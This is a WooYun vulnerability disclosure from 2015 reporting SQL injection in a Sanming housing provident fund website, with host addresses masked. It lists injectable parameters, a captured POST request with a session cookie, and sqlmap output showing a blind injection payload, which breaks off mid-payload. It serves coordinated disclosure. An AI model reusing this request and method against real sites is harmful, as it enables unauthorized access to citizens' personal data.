当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134375

漏洞标题:三明公积金中心存在SQL注入DBA权限(打包)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-08-18 23:14

修复时间:2015-10-03 11:30

公开时间:2015-10-03 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

继续找,又找到几处,一并提交了!~~~

详细说明:

1、
地址:

http://**.**.**.**/PublicInfoList.aspx


http://**.**.**.**/PublicInfoList.aspx?key=1&type=1&department=&begindate=&enddate=


key和department存在注入

1.jpg


2.jpg


3.jpg


2、
地址:

http://**.**.**.**/InformationView.aspx?InfoCode=0e4c819f-9bc9-4c9e-b834-0b88dbc825c1


InfoCode存在注入

4.jpg


5.jpg


6.jpg


3、

http://**.**.**.**/NewsBolckSecondList.aspx?class=d0f31435-11a7-4f41-bf35-11260336cb99&parentclass=c4c7a08a-5dbd-4791-88ee-d82af4ce4f8a


parentclass存在注入

7.jpg


8.jpg


9.jpg


一样后面获取数据有些不顺,就这样吧~~~~

漏洞证明:

另一处
1、抓包

POST http://**.**.**.**/LoanableEstate.aspx?class=9b96343b-0051-4bc1-a63c-3dbf6da619a3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**/LoanableEstate.aspx?class=9b96343b-0051-4bc1-a63c-3dbf6da619a3
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) QQBrowser/8.2.4258.400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Content-Length: 7699
Connection: Keep-Alive
Pragma: no-cache
Cookie: _gscbrs_477307201=1; _gscu_477307201=39621761kckh7n12; _gscs_477307201=t396319695op56219|pv:3; ASP.NET_SessionId=j4wpzi45gqjugy45vbyo15rs; DBInformation=DBInformation_T_Information_T_Information.Clicks=,f04afaa5-4f96-48a2-8836-48d535f49909Guest,; SiteFunction=SiteFunction_House=,1208,
__VIEWSTATE=%2FwEPDwUKMTc2NjE3MTE2OQ8WAh4MRGVmYXVsdEltYWdlBQ0vaW1hZ2VzLzMuanBnFgICAw9kFg4CAQ9kFgICAQ8WAh4LXyFJdGVtQ291bnQCDRYaAgEPZBYCZg8VAg4vSG9tZVBhZ2UuYXNweAbpppbpobVkAgIPZBYCZg8VAkcvSW5zdGl0dXRpb25zSW50cm9kdWNlZC5hc3B4P2NsYXNzPTZiNDM5Njk5LTkyMGUtNDliNC05NWI4LTUzZDczYmRmN2VlMQzmnLrmnoTnroDku4tkAgMPZBYCZg8VAj4vTmV3c0JvbGNrTGlzdC5hc3B4P2NsYXNzPTQ4MzA0ODFkLWUxODAtNDNlNi1hOWY1LWJiZjdmOWI4OTEzMwzmlL%2FnrZbms5Xop4RkAgQPZBYCZg8VAj4vTmV3c0JvbGNrTGlzdC5hc3B4P2NsYXNzPWM0YzdhMDhhLTVkYmQtNDc5MS04OGVlLWQ4MmFmNGNlNGY4YQzotYTorq%2Fkv6Hmga9kAgUPZBYCZg8VAhMvSW5mb3JtYXRpb25abi5hc3B4DOS%2FoeaBr%2BWFrOW8gGQCBg9kFgJmDxUCPS9MYXdHdWlkZU1haW4uYXNweD9jbGFzcz1jOTU3Njk1Yi1mMGM1LTQ5ZWMtYTEyOS1hZmZmN2ZiNTRlN2YM5Yqe5LqL5oyH5Y2XZAIHD2QWAmYPFQI%2FL0xvYW5hYmxlRXN0YXRlLmFzcHg%2FY2xhc3M9OWI5NjM0M2ItMDA1MS00YmMxLWE2M2MtM2RiZjZkYTYxOWEzDOWPr%2Bi0t%2BalvOebmGQCCA9kFgJmDxUCES9NZW1iZXJMb2dpbi5hc3B4DOWcqOe6v%2BafpeivomQCCQ9kFgJmDxUCGC9CdXNpbmVzc0NvbnN1bHRpbmcuYXNweAzlnKjnur%2Flkqjor6JkAgoPZBYCZg8VAhEvQ29tbXVuaWNhdGUuYXNweAzkuK3lv4PlnLDlm75kAgsPZBYCZg8VAg8vVG9vbHNMaXN0LmFzcHgM5bi455So5bel5YW3ZAIMD2QWAmYPFQISL0Rvd25Mb2FkTGlzdC5hc3B4DOS4i%2Bi9veS4reW%2Fg2QCDQ9kFgJmDxUCEy9QZXJmRGVtYW5kc1RKLmFzcHgM5pWI6IO96K%2BJ5rGCZAIFDxBkDxYFZgIBAgICAwIEFgUQBQ0tLeivt%2BmAieaLqS0tZWcQBQnllYblk4HmiL8FATFnEAUP57uP5rWO6YCC55So5oi%2FBQEyZxAFCeS6jOaJi%2BaIvwUBM2cQBQzlhbbku5bnsbvlnosFATRnZGQCCQ8WAh8BAgEWAgIBD2QWAmYPFQIcTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9MTIwOAznvo7lnLDlpKfpgZNkAgsPFgIfAQIHFg4CAQ9kFgZmDxUBHE5ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTEyMDhkAgEPDxYCHgRUZXh0BQnllYblk4HmiL9kZAICDxUCDOe%2BjuWcsOWkp%2BmBkwoyMDEyLTA1LTAzZAICD2QWBmYPFQEcTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9MTIwOWQCAQ8PFgIfAgUJ5ZWG5ZOB5oi%2FZGQCAg8VAgzlkInnpaXnpo%2FpgrgKMjAxMi0wNS0wM2QCAw9kFgZmDxUBHE5ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTEyMTBkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIJ5LiK5rKz5Z%2BOCjIwMTItMDUtMDNkAgQPZBYGZg8VARtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MjlkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIn5rOw5a6B5Zu95rOw5oi%2F5Zyw5Lqn5byA5Y%2BR5pyJ6ZmQ5YWs5Y%2B4AGQCBQ9kFgZmDxUBG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzMGQCAQ8PFgIfAgUJ5ZWG5ZOB5oi%2FZGQCAg8VAh3kuJzlronmlrDmnZExM%2BW5ou%2B8iOebm%2BWPke%2B8iQBkAgYPZBYGZg8VARtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzFkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIh5bel5Lia5YyX6LevMTA55Y%2B377yI55yB5LiA5bu677yJAGQCBw9kFgZmDxUBG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzMmQCAQ8PFgIfAgUJ5ZWG5ZOB5oi%2FZGQCAg8VAh7lt6XkuJrljZfot68xMTHlj7fvvIjnoYDpkavvvIkAZAINDxYCHwECChYUZg9kFgZmDxUGHE5ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTEyMDg5VXBsb2FkRmlsZS9Ib3VzZS9kMzdkYWRmMS1hZDAwLTQyMDQtOTZkMS1iZWM1MDI5ODRkZWIuanBnHE5ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTEyMDgM576O5Zyw5aSn6YGTACTkuInmmI7npo%2Fms7DpmobmiL%2FlnLDkuqfmnInpmZDlhazlj7hkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIKMjAxMi0wNS0wMxxOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT0xMjA4ZAIBD2QWBmYPFQYcTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9MTIwOTlVcGxvYWRGaWxlL0hvdXNlL2Y3MDZhNjc4LTYxMzQtNGM3Yi1iYjdlLWYxMzQ2ZTc1Mzc1Zi5qcGccTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9MTIwOQzlkInnpaXnpo%2FpgrgAJ%2BS4ieaYjuS8l%2BelpeaIv%2BWcsOS6p%2BW8gOWPkeaciemZkOWFrOWPuGQCAQ8PFgIfAgUJ5ZWG5ZOB5oi%2FZGQCAg8VAgoyMDEyLTA1LTAzHE5ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTEyMDlkAgIPZBYGZg8VBhxOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT0xMjEwOVVwbG9hZEZpbGUvSG91c2UvM2U4YTU4MjktMDFiYS00ODhkLWFiZGItYjc5OTJmOTNmOGNhLmpwZxxOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT0xMjEwCeS4iuays%2BWfjgAG5bGV5pe6ZAIBDw8WAh8CBQnllYblk4HmiL9kZAICDxUCCjIwMTItMDUtMDMcTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9MTIxMGQCAw9kFgZmDxUGG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQyOQ0vaW1hZ2VzLzMuanBnG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQyOSfms7DlroHlm73ms7DmiL%2FlnLDkuqflvIDlj5HmnInpmZDlhazlj7gAASBkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQyOWQCBA9kFgZmDxUGG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzMA0vaW1hZ2VzLzMuanBnG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzMB3kuJzlronmlrDmnZExM%2BW5ou%2B8iOebm%2BWPke%2B8iQAAZAIBDw8WAh8CBQnllYblk4HmiL9kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzBkAgUPZBYGZg8VBhtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzENL2ltYWdlcy8zLmpwZxtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzEh5bel5Lia5YyX6LevMTA55Y%2B377yI55yB5LiA5bu677yJAABkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzMWQCBg9kFgZmDxUGG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzMg0vaW1hZ2VzLzMuanBnG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzMh7lt6XkuJrljZfot68xMTHlj7fvvIjnoYDpkavvvIkAAGQCAQ8PFgIfAgUJ5ZWG5ZOB5oi%2FZGQCAg8VAgAbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDMyZAIHD2QWBmYPFQYbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDMzDS9pbWFnZXMvMy5qcGcbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDMzKueOq%2BeRsOaWsOadkTc444CBODDluaLvvIjpmLPlhYnln47Ct%2Beri%2BS4sAAAZAIBDw8WAh8CBQnllYblk4HmiL9kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzNkAggPZBYGZg8VBhtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzQNL2ltYWdlcy8zLmpwZxtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzQb5LiK55%2Bl5ZutMS0y5bmi77yI5bGV5pe677yJAABkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzNGQCCQ9kFgZmDxUGG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzNQ0vaW1hZ2VzLzMuanBnG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzNSbkuIHpppnmlrDmnZE4N%2BW5ou%2B8iOS6jOS4reaLhui%2FgeaIv%2B%2B8iQAAZAIBDw8WAh8CZWRkAgIPFQIAG05ld3NWaWV3LmFzcHg%2FSG91c2VDb2RlPTQzNWQCDw8PFgIeDlBhZ2VyUmVjb3JkTnVtAo4GZGQCEQ9kFggCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQhMaW5rTmFtZR4ORGF0YVZhbHVlRmllbGQFB0xpbmtVcmweC18hRGF0YUJvdW5kZ2QQFQMTLS0t5ZCI5L2c5Y2V5L2NLS0tLR7kuInmmI7miL%2FlnLDkuqfnrqHnkIbkv6Hmga%2FnvZEe5LiJ5piO5L2P5oi%2F572u5Lia5ouF5L%2Bd5YWs5Y%2B4FQMAF2h0dHA6Ly93d3cuc21mZGMuY29tLmNuE2h0dHA6Ly93d3cuc21mZGMuY24UKwMDZ2dnZGQCAw8QDxYGHwQFCExpbmtOYW1lHwUFB0xpbmtVcmwfBmdkEBUFEy0tLeaUv%2BW6nOmDqOmXqC0tLS0b5LiJ5piO5biC5Lq65rCR5pS%2F5bqc572R56uZHuS4reWkruS6uuawkeaUv%2BW6nOmXqOaIt%2Be9keermRjnpo%2Flu7rnnIHlu7rorr7kv6Hmga%2FnvZES56aP5bu655yB6LSi5pS%2F5Y6FFQUAFGh0dHA6Ly93d3cuc20uZ292LmNuEmh0dHA6Ly93d3cuZ292LmNuLxdodHRwOi8vd3d3LmZqanMuZ292LmNuLxlodHRwOi8vd3d3LmZqaWNwYS5vcmcuY24vFCsDBWdnZ2dnZGQCBQ8QDxYGHwQFCExpbmtOYW1lHwUFB0xpbmtVcmwfBmdkEBUMFi0tLeWFtuS7luWFrOenr%2BmHkS0tLS0b56aP5bee5L2P5oi%2F5YWs56ev6YeR572R56uZG%2BWOpumXqOS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvmvLPlt57kvY%2FmiL%2Flhaznp6%2Fph5HnvZHnq5kb5rOJ5bee5L2P5oi%2F5YWs56ev6YeR572R56uZG%2Bm%2BmeWyqeS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvljZflubPkvY%2FmiL%2Flhaznp6%2Fph5HnvZHnq5kb5a6B5b635L2P5oi%2F5YWs56ev6YeR572R56uZG%2BiOhueUsOS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvljJfkuqzkvY%2FmiL%2Flhaznp6%2Fph5HnvZHnq5kb5LiK5rW35L2P5oi%2F5YWs56ev6YeR572R56uZG%2BWkqea0peS9j%2BaIv%2BWFrOenr%2BmHkee9keermRUMABZodHRwOi8vd3d3LmZ6emZnamouY29tF2h0dHA6Ly93d3cueG1namouZ292LmNuGGh0dHA6Ly93d3cuenpnamouZ292LmNuLxRodHRwOi8vd3d3LnF6Z2pqLmNvbRlodHRwOi8vd3d3Lmxvbmd5YW5namouY29tFGh0dHA6Ly93d3cubnBnamouY29tFGh0dHA6Ly93d3cubmRnamouY29tFGh0dHA6Ly93d3cucHRnamouY29tF2h0dHA6Ly93d3cuYmpnamouZ292LmNuFGh0dHA6Ly93d3cuc2hnamouY29tF2h0dHA6Ly93d3cuaG91c2VmdW5kLmNuFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgcPEA8WBh8EBQhMaW5rTmFtZR8FBQdMaW5rVXJsHwZnZBAVCBMtLS3lhbbku5bnvZHnq5ktLS0tD%2BaIv%2BS6p%2BS5i%2Beql%2Be9kQbnmb7luqYJ5Lq65rCR572RCeWSjOiur%2Be9kQnmlrDljY7nvZEP56aP5bee5pCc5oi%2F572RCeS4reWNjue9kRUIABhodHRwOi8vd3d3LmVob21lZGF5LmNvbS8UaHR0cDovL3d3dy5iYWlkdS5jb20ZaHR0cDovL3d3dy5wZW9wbGUuY29tLmNuLxVodHRwOi8vd3d3LmhleHVuLmNvbS8ZaHR0cDovL3d3dy54aW5odWFuZXQuY29tLxVodHRwOi8vZnouc291ZnVuLmNvbS8baHR0cDovL3d3dy5jaGluYS5jb20vemhfY24vFCsDCGdnZ2dnZ2dnZGRk4AzTISsBc3C51U%2FQWKj6EEy3DEk%3D&__EVENTVALIDATION=%2FwEWJALKw9r2DwKL%2B9KyDgK0gMnQAQK77%2BO%2BDQK67%2BO%2BDQK57%2BO%2BDQK47%2BO%2BDQKln%2FPuCgK9l%2BPkCwKN5NbZBwLb2KFcAuXp1uwLAv%2BYtpwJAvzjt4ACApbribUJAtON%2BOkCAuGR%2B4QKAveSyOQNApCGuoUEArmSlLwKArfNzccIAr%2FFrYAMAvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcOArb4gqUJAtL4xMcOAuGA1Z8HAvD9kDgCkt303QkCtfe5hgztA6Zki3dYxanBdAszdHoDvsxjWg%3D%3D&txtKey=1&ddlType=1&btnSearch=%E6%9F%A5%E6%89%BE&ddlPageIndex=1&HomePageBottomInfo1%24dlsthzdw=&HomePageBottomInfo1%24dlstzfbm=&HomePageBottomInfo1%24dlstqtgjj=&HomePageBottomInfo1%24dlstqtwz=


txtKey参数存在注入
2、使用神器sqlmap

sqlmap identified the following injection points with a total of 1191 HTTP(s) re
quests:
---
Place: POST
Parameter: txtKey
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTc2NjE3MTE2OQ8WAh4MRGVmYXVsdEltYWdlBQ0vaW1hZ2V
zLzMuanBnFgICAw9kFg4CAQ9kFgICAQ8WAh4LXyFJdGVtQ291bnQCDRYaAgEPZBYCZg8VAg4vSG9tZVB
hZ2UuYXNweAbpppbpobVkAgIPZBYCZg8VAkcvSW5zdGl0dXRpb25zSW50cm9kdWNlZC5hc3B4P2NsYXN
zPTZiNDM5Njk5LTkyMGUtNDliNC05NWI4LTUzZDczYmRmN2VlMQzmnLrmnoTnroDku4tkAgMPZBYCZg8
VAj4vTmV3c0JvbGNrTGlzdC5hc3B4P2NsYXNzPTQ4MzA0ODFkLWUxODAtNDNlNi1hOWY1LWJiZjdmOWI
4OTEzMwzmlL/nrZbms5Xop4RkAgQPZBYCZg8VAj4vTmV3c0JvbGNrTGlzdC5hc3B4P2NsYXNzPWM0Yzd
hMDhhLTVkYmQtNDc5MS04OGVlLWQ4MmFmNGNlNGY4YQzotYTorq/kv6Hmga9kAgUPZBYCZg8VAhMvSW5
mb3JtYXRpb25abi5hc3B4DOS/oeaBr+WFrOW8gGQCBg9kFgJmDxUCPS9MYXdHdWlkZU1haW4uYXNweD9
jbGFzcz1jOTU3Njk1Yi1mMGM1LTQ5ZWMtYTEyOS1hZmZmN2ZiNTRlN2YM5Yqe5LqL5oyH5Y2XZAIHD2Q
WAmYPFQI/L0xvYW5hYmxlRXN0YXRlLmFzcHg/Y2xhc3M9OWI5NjM0M2ItMDA1MS00YmMxLWE2M2MtM2R
iZjZkYTYxOWEzDOWPr+i0t+alvOebmGQCCA9kFgJmDxUCES9NZW1iZXJMb2dpbi5hc3B4DOWcqOe6v+a
fpeivomQCCQ9kFgJmDxUCGC9CdXNpbmVzc0NvbnN1bHRpbmcuYXNweAzlnKjnur/lkqjor6JkAgoPZBY
CZg8VAhEvQ29tbXVuaWNhdGUuYXNweAzkuK3lv4PlnLDlm75kAgsPZBYCZg8VAg8vVG9vbHNMaXN0LmF
zcHgM5bi455So5bel5YW3ZAIMD2QWAmYPFQISL0Rvd25Mb2FkTGlzdC5hc3B4DOS4i+i9veS4reW/g2Q
CDQ9kFgJmDxUCEy9QZXJmRGVtYW5kc1RKLmFzcHgM5pWI6IO96K+J5rGCZAIFDxBkDxYFZgIBAgICAwI
EFgUQBQ0tLeivt+mAieaLqS0tZWcQBQnllYblk4HmiL8FATFnEAUP57uP5rWO6YCC55So5oi/BQEyZxA
FCeS6jOaJi+aIvwUBM2cQBQzlhbbku5bnsbvlnosFATRnZGQCCQ8WAh8BAgEWAgIBD2QWAmYPFQIcTmV
3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9MTIwOAznvo7lnLDlpKfpgZNkAgsPFgIfAQIHFg4CAQ9kFgZmDxU
BHE5ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTEyMDhkAgEPDxYCHgRUZXh0BQnllYblk4HmiL9kZAICDxU
CDOe+juWcsOWkp+mBkwoyMDEyLTA1LTAzZAICD2QWBmYPFQEcTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU
9MTIwOWQCAQ8PFgIfAgUJ5ZWG5ZOB5oi/ZGQCAg8VAgzlkInnpaXnpo/pgrgKMjAxMi0wNS0wM2QCAw9
kFgZmDxUBHE5ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTEyMTBkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgI
PFQIJ5LiK5rKz5Z+OCjIwMTItMDUtMDNkAgQPZBYGZg8VARtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT0
0MjlkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIn5rOw5a6B5Zu95rOw5oi/5Zyw5Lqn5byA5Y+R5py
J6ZmQ5YWs5Y+4AGQCBQ9kFgZmDxUBG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMGQCAQ8PFgIfAgU
J5ZWG5ZOB5oi/ZGQCAg8VAh3kuJzlronmlrDmnZExM+W5ou+8iOebm+WPke+8iQBkAgYPZBYGZg8VARt
OZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzFkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIh5bel5Li
a5YyX6LevMTA55Y+377yI55yB5LiA5bu677yJAGQCBw9kFgZmDxUBG05ld3NWaWV3LmFzcHg/SG91c2V
Db2RlPTQzMmQCAQ8PFgIfAgUJ5ZWG5ZOB5oi/ZGQCAg8VAh7lt6XkuJrljZfot68xMTHlj7fvvIjnoYD
pkavvvIkAZAINDxYCHwECChYUZg9kFgZmDxUGG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMA0vaW1
hZ2VzLzMuanBnG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMB3kuJzlronmlrDmnZExM+W5ou+8iOe
bm+WPke+8iQAAZAIBDw8WAh8CBQnllYblk4HmiL9kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29
kZT00MzBkAgEPZBYGZg8VBhtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzENL2ltYWdlcy8zLmpwZxt
OZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzEh5bel5Lia5YyX6LevMTA55Y+377yI55yB5LiA5bu677y
JAABkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMWQ
CAg9kFgZmDxUGG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQzMg0vaW1hZ2VzLzMuanBnG05ld3NWaWV
3LmFzcHg/SG91c2VDb2RlPTQzMh7lt6XkuJrljZfot68xMTHlj7fvvIjnoYDpkavvvIkAAGQCAQ8PFgI
fAgUJ5ZWG5ZOB5oi/ZGQCAg8VAgAbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDMyZAIDD2QWBmYPFQY
bTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDM0DS9pbWFnZXMvMy5qcGcbTmV3c1ZpZXcuYXNweD9Ib3V
zZUNvZGU9NDM0G+S4iuefpeWbrTEtMuW5ou+8iOWxleaXuu+8iQAAZAIBDw8WAh8CBQnllYblk4HmiL9
kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00MzRkAgQPZBYGZg8VBhtOZXdzVmlldy5hc3B
4P0hvdXNlQ29kZT00NDENL2ltYWdlcy8zLmpwZxtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00NDEj546
r55Gw5paw5p2RNzPjgIE3N+OAgTgx5bmiKOeri+S4sCkAAGQCAQ8PFgIfAgUJ5ZWG5ZOB5oi/ZGQCAg8
VAgAbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDQxZAIFD2QWBmYPFQYbTmV3c1ZpZXcuYXNweD9Ib3V
zZUNvZGU9NDQ2DS9pbWFnZXMvMy5qcGcbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDQ2JeS5vum+mea
WsOadkTMwMeW5ou+8iOaXtuS7oy7mnpfnq4vvvIkAAGQCAQ8PFgIfAgUJ5ZWG5ZOB5oi/ZGQCAg8VAgA
bTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDQ2ZAIGD2QWBmYPFQYbTmV3c1ZpZXcuYXNweD9Ib3VzZUN
vZGU9NDUwDS9pbWFnZXMvMy5qcGcbTmV3c1ZpZXcuYXNweD9Ib3VzZUNvZGU9NDUwGuW3peS4muWNl+i
3rzE2N+WPtyjpl73mlrApAABkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg
/SG91c2VDb2RlPTQ1MGQCBw9kFgZmDxUGG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQ1Mg0vaW1hZ2V
zLzMuanBnG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQ1MhzkuIrmmKXlm60xLTM15bmi77yI5bGV5pe
677yJAABkAgEPDxYCHwIFCeWVhuWTgeaIv2RkAgIPFQIAG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQ
1MmQCCA9kFgZmDxUGG05ld3NWaWV3LmFzcHg/SG91c2VDb2RlPTQ1NQ0vaW1hZ2VzLzMuanBnG05ld3N
WaWV3LmFzcHg/SG91c2VDb2RlPTQ1NSPlt6XkuJrot68xMDDlj7c1MOW5ou+8iOecgeS4gOW7uu+8iQA
AZAIBDw8WAh8CBQnllYblk4HmiL9kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00NTVkAgk
PZBYGZg8VBhtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00NTgNL2ltYWdlcy8zLmpwZxtOZXdzVmlldy5
hc3B4P0hvdXNlQ29kZT00NTgf5rC05qat5paw5Z+OOS0xMuW5ou+8iOaYk+i+vu+8iQAAZAIBDw8WAh8
CBQnllYblk4HmiL9kZAICDxUCABtOZXdzVmlldy5hc3B4P0hvdXNlQ29kZT00NThkAg8PDxYCHg5QYWd
lclJlY29yZE51bQJ6ZGQCEQ9kFggCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQhMaW5rTmFtZR4ORGF0YVZ
hbHVlRmllbGQFB0xpbmtVcmweC18hRGF0YUJvdW5kZ2QQFQMTLS0t5ZCI5L2c5Y2V5L2NLS0tLR7kuIn
mmI7miL/lnLDkuqfnrqHnkIbkv6Hmga/nvZEe5LiJ5piO5L2P5oi/572u5Lia5ouF5L+d5YWs5Y+4FQM
AF2h0dHA6Ly93d3cuc21mZGMuY29tLmNuE2h0dHA6Ly93d3cuc21mZGMuY24UKwMDZ2dnZGQCAw8QDxY
GHwQFCExpbmtOYW1lHwUFB0xpbmtVcmwfBmdkEBUFEy0tLeaUv+W6nOmDqOmXqC0tLS0b5LiJ5piO5bi
C5Lq65rCR5pS/5bqc572R56uZHuS4reWkruS6uuawkeaUv+W6nOmXqOaIt+e9keermRjnpo/lu7rnnIH
lu7rorr7kv6Hmga/nvZES56aP5bu655yB6LSi5pS/5Y6FFQUAFGh0dHA6Ly93d3cuc20uZ292LmNuEmh
0dHA6Ly93d3cuZ292LmNuLxdodHRwOi8vd3d3LmZqanMuZ292LmNuLxlodHRwOi8vd3d3LmZqaWNwYS5
vcmcuY24vFCsDBWdnZ2dnZGQCBQ8QDxYGHwQFCExpbmtOYW1lHwUFB0xpbmtVcmwfBmdkEBUMFi0tLeW
FtuS7luWFrOenr+mHkS0tLS0b56aP5bee5L2P5oi/5YWs56ev6YeR572R56uZG+WOpumXqOS9j+aIv+W
FrOenr+mHkee9keermRvmvLPlt57kvY/miL/lhaznp6/ph5HnvZHnq5kb5rOJ5bee5L2P5oi/5YWs56e
v6YeR572R56uZG+m+meWyqeS9j+aIv+WFrOenr+mHkee9keermRvljZflubPkvY/miL/lhaznp6/ph5H
nvZHnq5kb5a6B5b635L2P5oi/5YWs56ev6YeR572R56uZG+iOhueUsOS9j+aIv+WFrOenr+mHkee9kee
rmRvljJfkuqzkvY/miL/lhaznp6/ph5HnvZHnq5kb5LiK5rW35L2P5oi/5YWs56ev6YeR572R56uZG+W
kqea0peS9j+aIv+WFrOenr+mHkee9keermRUMABZodHRwOi8vd3d3LmZ6emZnamouY29tF2h0dHA6Ly9
3d3cueG1namouZ292LmNuGGh0dHA6Ly93d3cuenpnamouZ292LmNuLxRodHRwOi8vd3d3LnF6Z2pqLmN
vbRlodHRwOi8vd3d3Lmxvbmd5YW5namouY29tFGh0dHA6Ly93d3cubnBnamouY29tFGh0dHA6Ly93d3c
ubmRnamouY29tFGh0dHA6Ly93d3cucHRnamouY29tF2h0dHA6Ly93d3cuYmpnamouZ292LmNuFGh0dHA
6Ly93d3cuc2hnamouY29tF2h0dHA6Ly93d3cuaG91c2VmdW5kLmNuFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgc
PEA8WBh8EBQhMaW5rTmFtZR8FBQdMaW5rVXJsHwZnZBAVCBMtLS3lhbbku5bnvZHnq5ktLS0tD+aIv+S
6p+S5i+eql+e9kQbnmb7luqYJ5Lq65rCR572RCeWSjOiur+e9kQnmlrDljY7nvZEP56aP5bee5pCc5oi
/572RCeS4reWNjue9kRUIABhodHRwOi8vd3d3LmVob21lZGF5LmNvbS8UaHR0cDovL3d3dy5iYWlkdS5
